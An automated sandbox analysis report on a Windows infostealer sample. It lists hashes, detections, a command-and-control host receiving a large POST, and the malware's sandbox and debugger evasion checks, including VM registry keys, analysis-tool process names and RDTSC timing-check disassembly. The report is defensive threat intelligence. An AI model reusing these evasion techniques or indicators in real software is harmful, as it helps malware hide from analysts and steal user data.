Windows Analysis Report
S0O8qbVwLk.exe

Overview

General Information

Sample name:S0O8qbVwLk.exe
renamed because original name is a hash value
Original sample name:308b5cef77c672f677d2245307116688.exe
Analysis ID:1578955
MD5:308b5cef77c672f677d2245307116688
SHA1:7c71404394a0f8cc5db7e045b1397211fd5ccf8c
SHA256:5c6029db1e5fd370a90763ce8f2f2ab02a4188c4f82e342a7dca9fcba555156f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • S0O8qbVwLk.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\S0O8qbVwLk.exe" MD5: 308B5CEF77C672F677D2245307116688)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: S0O8qbVwLk.exeAvira: detected
Source: S0O8qbVwLk.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: S0O8qbVwLk.exeJoe Sandbox ML: detected
Source: S0O8qbVwLk.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: S0O8qbVwLk.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 502459
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 502459
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: S0O8qbVwLk.exe, 00000000.00000003.2926759037.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948933338.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949494327.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WE
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: S0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: S0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: S0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716

System Summary

Source: S0O8qbVwLk.exeStatic PE information: section name:
Source: S0O8qbVwLk.exeStatic PE information: section name: .idata
Source: S0O8qbVwLk.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: S0O8qbVwLk.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: S0O8qbVwLk.exe Static PE information: Section: eqznuyix ZLIB complexity 0.9943493728681069
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@27/2
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: S0O8qbVwLk.exe ReversingLabs: Detection: 65%
Source: S0O8qbVwLk.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: S0O8qbVwLk.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Section loaded: kernel.appcore.dll
Source: S0O8qbVwLk.exe Static file information: File size 4453888 > 1048576
Source: S0O8qbVwLk.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: S0O8qbVwLk.exe Static PE information: Raw size of eqznuyix is bigger than: 0x100000 < 0x1b7c00

Data Obfuscation

Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Unpacked PE file: 0.2.S0O8qbVwLk.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqznuyix:EW;ewsdhmii:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqznuyix:EW;ewsdhmii:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: S0O8qbVwLk.exe Static PE information: real checksum: 0x44d17a should be: 0x446e74
Source: S0O8qbVwLk.exe Static PE information: section name:
Source: S0O8qbVwLk.exe Static PE information: section name: .idata
Source: S0O8qbVwLk.exe Static PE information: section name:
Source: S0O8qbVwLk.exe Static PE information: section name: eqznuyix
Source: S0O8qbVwLk.exe Static PE information: section name: ewsdhmii
Source: S0O8qbVwLk.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Code function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: S0O8qbVwLk.exe Static PE information: section name: eqznuyix entropy: 7.95498516764781

Boot Survival

Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\S0O8qbVwLk.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3F8C9 second address: F3F8E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F07E55 second address: F07E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F07E5B second address: F07E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F41F2A second address: F41F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4293B second address: F42941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F42720 second address: F42725 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F42941 second address: F429A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, dword ptr [ebp+122D21DBh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F8E2D690EE8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F8E2D690EE8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jc 00007F8E2D690EE8h 0x00000052 push edx 0x00000053 pop edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F429A8 second address: F429AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F429AE second address: F429B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F429B2 second address: F429B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43EE1 second address: F43F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 jmp 00007F8E2D690EEBh 0x0000000c pop eax 0x0000000d nop 0x0000000e add dword ptr [ebp+12452112h], edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F8E2D690EE8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 clc 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D389Dh] 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43F30 second address: F43F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F8E2D68FC56h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F8E2D68FC56h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43F4D second address: F43F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43F51 second address: F43F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F44968 second address: F4496E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F454B6 second address: F454BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6AD second address: F4A6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EECh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6BE second address: F4A6C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6C3 second address: F4A6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F8E2D690EE8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6D5 second address: F4A6E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F499D8 second address: F499DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F499DC second address: F499F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F49AB0 second address: F49AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8E2D690EE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4C5D0 second address: F4C5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4C5ED second address: F4C5F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F0642C second address: F06430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F06430 second address: F06441 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F8E2D690EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F06441 second address: F06445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4DCBB second address: F4DCBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4FDBC second address: F4FDC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50041 second address: F50045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F51F18 second address: F51F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
